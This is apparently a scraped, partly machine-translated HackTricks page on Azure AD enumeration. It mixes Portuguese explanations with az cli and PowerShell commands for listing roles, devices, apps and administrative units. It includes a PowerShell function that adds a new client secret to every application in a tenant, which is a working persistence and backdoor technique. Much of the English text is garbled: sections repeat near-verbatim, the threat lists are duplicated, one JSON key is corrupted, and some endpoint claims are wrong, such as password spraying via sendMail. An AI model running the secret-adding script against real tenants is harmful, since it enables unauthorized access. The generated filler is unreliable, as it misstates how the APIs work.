Outras maneiras de apoiar o HackTricks:

• Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!

• Adquira o swag oficial PEASS & HackTricks

• Descubra A Família PEASS, nossa coleção exclusiva de NFTs

• Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.

• Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.

```powershell # Just call Add-AzADAppSecret Function Add-AzADAppSecret { <# .SYNOPSIS Add client secret to the applications.

.PARAMETER GraphToken Pass the Graph API Token

.EXAMPLE PS C:> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

.LINK https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http #>

[CmdletBinding()] param( [Parameter(Mandatory=$True)] [String] $GraphToken = $null )

$AppList = $null $AppPassword = $null

List All the Applications

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications" "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

try { $AppList = Invoke-RestMethod @Params -UseBasicParsing } catch { }

Add Password in the Application

if($AppList -ne $null) { [System.Collections.ArrayList]$Details = @()

foreach($App in $AppList.value) { $ID = $App.ID $psobj = New-Object PSObject

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword" "Method" = "POST" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

$Body = @{ "passwordCredential"= @{ "displayName" = "Password" } }

try { $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json) Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText $Details.Add($psobj) | Out-Null } catch { Write-Output "Failed to add new client secret to '$($App.displayName)' Application." } } if($Details -ne $null) { Write-Output "" Write-Output "Client secret added to : " Write-Output $Details | fl * } } else { Write-Output "Failed to Enumerate the Applications." } }

</details>

### Funções

<div data-gb-custom-block data-tag="tabs"></div>

<div data-gb-custom-block data-tag="tab" data-title='az cli'>

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"

Azure AD

Enumeration

User Enumeration

To enumerate users in Azure AD, you can use the Graph API or tools like Azure AD Recon or Azure AD User Enumeration.

Using Graph API

You can use the Graph API to list users in Azure AD. Make a GET request to https://graph.microsoft.com/v1.0/users.

Using Azure AD Recon

Azure AD Recon is a tool that can be used to perform user enumeration in Azure AD. It can help identify valid usernames in the directory.

Using Azure AD User Enumeration

Azure AD User Enumeration is another tool that can be used to enumerate users in Azure AD. It can help identify valid usernames and gather information about users in the directory.

Group Enumeration

To enumerate groups in Azure AD, you can use the Graph API or tools like Azure AD Recon or Azure AD Group Enumeration.

Using Graph API

You can use the Graph API to list groups in Azure AD. Make a GET request to https://graph.microsoft.com/v1.0/groups.

Using Azure AD Recon

Azure AD Recon can also be used to enumerate groups in Azure AD. It can help identify existing groups and their members.

Using Azure AD Group Enumeration

Azure AD Group Enumeration is a tool that can be used to enumerate groups in Azure AD. It can help identify existing groups and gather information about group members.

Exploitation

Password Spraying

Password spraying attacks can be performed against Azure AD to attempt to gain access to user accounts by trying a few common passwords against many accounts.

Phishing

Phishing attacks can be used to trick users into revealing their credentials, which can then be used to gain unauthorized access to Azure AD.

Brute Force

Brute force attacks can be used to crack weak passwords by trying many possible combinations until the correct one is found.

Token Impersonation

Token impersonation attacks involve stealing or forging tokens to impersonate a user and gain unauthorized access to resources in Azure AD.

Password Policies Bypass

Some misconfigurations in password policies can be exploited to bypass password requirements and gain unauthorized access to Azure AD resources.

OAuth Token Abuse

OAuth token abuse involves abusing OAuth tokens to gain unauthorized access to resources in Azure AD.

Privilege Escalation

Privilege escalation attacks involve gaining higher levels of access in Azure AD than originally granted, allowing an attacker to perform unauthorized actions.

Account Takeover

Account takeover attacks involve gaining unauthorized access to a user's account in Azure AD, allowing an attacker to impersonate the user and perform actions on their behalf.

Data Exfiltration

Data exfiltration attacks involve stealing sensitive data from Azure AD, such as user information or credentials, and transferring it to an external location.

Federation Trust Exploitation

Federation trust exploitation attacks involve exploiting trust relationships between Azure AD and external identity providers to gain unauthorized access to resources.

Application Impersonation

Application impersonation attacks involve impersonating a legitimate application to gain unauthorized access to resources in Azure AD.

Insider Threats

Insider threats involve malicious actions taken by users with legitimate access to Azure AD, such as stealing data or disrupting services.

Malware Injection

Malware injection attacks involve injecting malicious code into Azure AD to gain unauthorized access or disrupt services.

Data Manipulation

Data manipulation attacks involve altering or deleting data in Azure AD to achieve unauthorized actions or disrupt operations.

Session Hijacking

Session hijacking attacks involve taking over a user's active session in Azure AD to gain unauthorized access to their account.

Cross-Site Scripting (XSS)

Cross-Site Scripting attacks involve injecting malicious scripts into web applications to steal data or perform unauthorized actions in Azure AD.

Remote Code Execution (RCE)

Remote Code Execution attacks involve executing malicious code on Azure AD servers to gain unauthorized access or disrupt services.

DNS Spoofing

DNS spoofing attacks involve redirecting DNS queries to malicious servers to intercept traffic and gain unauthorized access to Azure AD resources.

Man-in-the-Middle (MitM) Attacks

Man-in-the-Middle attacks involve intercepting communication between users and Azure AD to eavesdrop on sensitive information or manipulate data.

Social Engineering

Social engineering attacks involve manipulating users into performing actions or revealing sensitive information that can be used to gain unauthorized access to Azure AD.

Insider Threats

Insider threats involve malicious actions taken by users with legitimate access to Azure AD, such as stealing data or disrupting services.

Malware Injection

Malware injection attacks involve injecting malicious code into Azure AD to gain unauthorized access or disrupt services.

Data Manipulation

Data manipulation attacks involve altering or deleting data in Azure AD to achieve unauthorized actions or disrupt operations.

Session Hijacking

Session hijacking attacks involve taking over a user's active session in Azure AD to gain unauthorized access to their account.

Cross-Site Scripting (XSS)

Cross-Site Scripting attacks involve injecting malicious scripts into web applications to steal data or perform unauthorized actions in Azure AD.

Remote Code Execution (RCE)

Remote Code Execution attacks involve executing malicious code on Azure AD servers to gain unauthorized access or disrupt services.

DNS Spoofing

DNS spoofing attacks involve redirecting DNS queries to malicious servers to intercept traffic and gain unauthorized access to Azure AD resources.

Man-in-the-Middle (MitM) Attacks

Man-in-the-Middle attacks involve intercepting communication between users and Azure AD to eavesdrop on sensitive information or manipulate data.

Social Engineering

Social engineering attacks involve manipulating users into performing actions or revealing sensitive information that can be used to gain unauthorized access to Azure AD.

```powershell # Get all available role templates Get-AzureADDirectoryroleTemplate # Get enabled roles (Assigned roles) Get-AzureADDirectoryRole Get-AzureADDirectoryRole -ObjectId #Get info about the role # Get custom roles - use AzureAdPreview Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName # Users assigned a role (Global Administrator) Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember Get-AzureADDirectoryRole -ObjectId | fl # Roles of the Administrative Unit (who has permissions over the administrative unit and its members) Get-AzureADMSScopedRoleMembership -Id | fl * ```

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in Azure AD, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in Azure AD, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in Azure AD, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in Azure AD, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in Azure AD, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in Azure AD, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Replace <DirectoryRoleObjectId> with the actual object ID of the directory role you want to enumerate members for.

# Get role assignments on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>

# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

Dispositivos

# If you know how to do this send a PR!

Azure AD

Enumeration

Users

1. Enumerate users using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/users?api-version=1.6

2. Enumerate users using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/users

Groups

1. Enumerate groups using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/groups?api-version=1.6

2. Enumerate groups using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/groups

Applications

1. Enumerate applications using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/applications?api-version=1.6

2. Enumerate applications using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/applications

Exploitation

Password Spraying

1. Perform password spraying attacks against Azure AD:

POST https://login.microsoftonline.com/myorganization/oauth2/token

Phishing

1. Conduct phishing campaigns targeting Azure AD users.

Brute Force

1. Perform brute force attacks against Azure AD authentication endpoints.

Post-Exploitation

Token Extraction

1. Extract tokens from compromised Azure AD accounts.

Persistence

1. Establish persistence by creating backdoors in Azure AD configurations.

Data Exfiltration

1. Exfiltrate sensitive data from Azure AD using various techniques.

# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registred users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get dives managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }

Se um dispositivo (VM) estiver associado ao AzureAD, os usuários do AzureAD poderão fazer login. Além disso, se o usuário logado for Proprietário do dispositivo, ele será administrador local.

Aplicações

Apps são Registros de Aplicativos no portal (não Aplicações Corporativas). Mas cada Registro de Aplicativo irá criar uma Aplicação Corporativa (Principal de Serviço) com o mesmo nome. Além disso, se o App for um App multi-inquilino, outra Aplicação Corporativa (Principal de Serviço) será criada naquele inquilino com o mesmo nome.

Quando um App é gerado, são concedidos 2 tipos de permissões:

• Permissões concedidas ao Principal de Serviço

• Permissões que o app pode ter e usar em nome do usuário.

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"

Azure AD

Enumeration

Users

1. Enumerate users using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/users?api-version=1.6

2. Enumerate users using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/users

Groups

1. Enumerate groups using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/groups?api-version=1.6

2. Enumerate groups using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/groups

Applications

1. Enumerate applications using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/applications?api-version=1.6

2. Enumerate applications using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/applications

Exploitation

Password Spray Attack

1. Perform a password spray attack using the Microsoft Graph API:

POST https://graph.microsoft.com/v1.0/users/{user_id}/sendMail

Token Impersonation

1. Perform token impersonation using the Microsoft Graph API:

POST https://graph.microsoft.com/v1.0/users/{user_id}/sendMail

Persistence

Application Consent

1. Grant application consent using the Azure AD Graph API:

POST https://graph.windows.net/myorganization/oauth2PermissionGrants?api-version=1.6
``json
{
  "clientId": "{client_id}",
  "consentType": "AllPrincipals",
  "resourceId": "{resource_id}"
}

2. Grant application consent using Microsoft Graph API:

POST https://graph.microsoft.com/v1.0/oauth2PermissionGrants
``json
{
  "clientId": "{client_id}",
  "consjsonentType": "AllPrincipals",
  "resourceId": "{resource_id}"
}

# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *

AzureAD

Enumerate AzureAD roles

Get-AzureADDirectoryRole

Enumerate AzureAD users

Get-AzureADUser

Enumerate AzureAD groups

Get-AzureADGroup

Enumreamte AzureAD group members

Get-AzureADGroupMember -ObjectId <groupObjectId>

Enumerate AzureAD service principals

Get-AzureADServicePrincipal

Enumerate AzureAD applications

Get-AzureADApplication

Enumerate AzureAD devices

Get-AzureADDevice
``json

# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential

Um aplicativo com a permissão AppRoleAssignment.ReadWrite pode escalar para Administrador Global concedendo a si mesmo a função. Para mais informações verifique isso.

Uma string secreta que o aplicativo usa para provar sua identidade ao solicitar um token é a senha do aplicativo. Portanto, se encontrar esta senha, você pode acessar como o princípio de serviço dentro do locatário. Observe que esta senha só é visível quando gerada (você poderia alterá-la, mas não pode obtê-la novamente). O proprietário do aplicativo pode adicionar uma senha a ele (para que ele possa se passar por ele). Os logins como esses princípios de serviço não são marcados como arriscados e eles não terão MFA.

Diferença entre Aplicativos e (Aplicativos Corporativos ou Princípios de Serviço)

Diferença entre um aplicativo e um Princípio de Serviço no Azure:

• Aplicativo/Registros de Aplicativos: São aplicativos que existem no seu Azure AD

• (Get-AzureADApplication -filter "DisplayName eq 'testapp'")

• Princípio de Serviço/Aplicativos Corporativos: Objetos de segurança no seu Azure AD que podem ter privilégios no Diretório Azure e estão vinculados ao seu aplicativo ou a um aplicativo de terceiros

• Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")

• Um administrador pode precisar aprovar as permissões concedidas se forem muito sensíveis.

Um aplicativo pode estar em um locatário de terceiros e uma vez que você começa a usá-lo e dá acesso a ele, um Aplicativo Corporativo/Princípio de Serviço é criado em seu locatário para dar acesso às informações de que ele precisa:

Unidades Administrativas

É usado para melhor gerenciamento de usuários.

As unidades administrativas restringem permissões em uma função para qualquer parte de sua organização que você define. Você poderia, por exemplo, usar unidades administrativas para delegar a função de Administrador de Helpdesk a especialistas em suporte regional, para que eles possam gerenciar usuários apenas na região que eles suportam.

Portanto, você pode atribuir funções à unidade administrativa e os membros dela terão essas funções.

AzureAD

Enumeration

Users

• List all users:

  • GET https://graph.windows.net/myorganization/users?api-version=1.6

• Get user by object ID:

  • GET https://graph.windows.net/myorganization/users/{object_id}?api-version=1.6

• Get user by user principal name:

  • GET https://graph.windows.net/myorganization/users/{user_principal_name}?api-version=1.6

Groups

• List all groups:

  • GET https://graph.windows.net/myorganization/groups?api-version=1.6

• Get group by object ID:

  • GET https://graph.windows.net/myorganization/groups/{object_id}?api-version=1.6

• Get group by display name:

  • GET https://graph.windows.net/myorganization/groups?$filter=displayName eq '{display_name}'&api-version=1.6

Applications

• List all applications:

  • GET https://graph.windows.net/myorganization/applications?api-version=1.6

• Get application by object ID:

  • GET https://graph.windows.net/myorganization/applications/{object_id}?api-version=1.6

• Get application by display name:

  • GET https://graph.windows.net/myorganization/applications?$filter=displayName eq '{display_name}'&api-version=1.6

Exploitation

• Password Spray Attack:

  • Perform password spray attacks using a list of common passwords against Azure AD accounts to identify weak passwords.

• Phishing Attacks:

  • Conduct phishing attacks to trick users into revealing their credentials, which can then be used to gain unauthorized access to Azure AD resources.

• Brute Force Attacks:

  • Launch brute force attacks to guess user passwords and gain unauthorized access to Azure AD accounts.

# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members

Proteção de Identidade do Azure AD (AIP)

A Proteção de Identidade do Azure AD (AIP) é um serviço de segurança que utiliza detecção automatizada e remediação para ajudar a proteger as identidades do usuário no Azure Active Directory contra comprometimento. A AIP monitora continuamente e avalia o risco de logins de usuários e configurações de identidade, aplicando automaticamente medidas de segurança apropriadas, como exigir autenticação multifator ou bloquear atividades potencialmente perigosas. Isso ajuda as organizações a prevenir violações de segurança baseadas em identidade.

Fluxo:

1. A Proteção de Identidade do Azure AD monitora as atividades do usuário e coleta dados sobre logins de usuários, eventos de autenticação e outras atividades relevantes.

2. O serviço utiliza algoritmos de aprendizado de máquina para analisar esses dados e detectar possíveis ameaças de segurança.

3. A Proteção de Identidade do Azure AD atribui um nível de risco à ameaça (por exemplo, login) e gera um alerta, se necessário, para realizar alguma ação automática.

Proteção de Senha do Azure AD (APP)

A Proteção de Senha do Azure AD (APP) é um recurso de segurança que ajuda a prevenir senhas fracas no Azure Active Directory, aplicando políticas de senha fortes. O APP bloqueia senhas fracas comumente usadas e suas variantes, reduzindo o risco de violações relacionadas a senhas. Pode ser aplicado tanto no nível da nuvem quanto no Active Directory local, aprimorando a segurança geral das senhas em toda a organização.

Referências

• https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units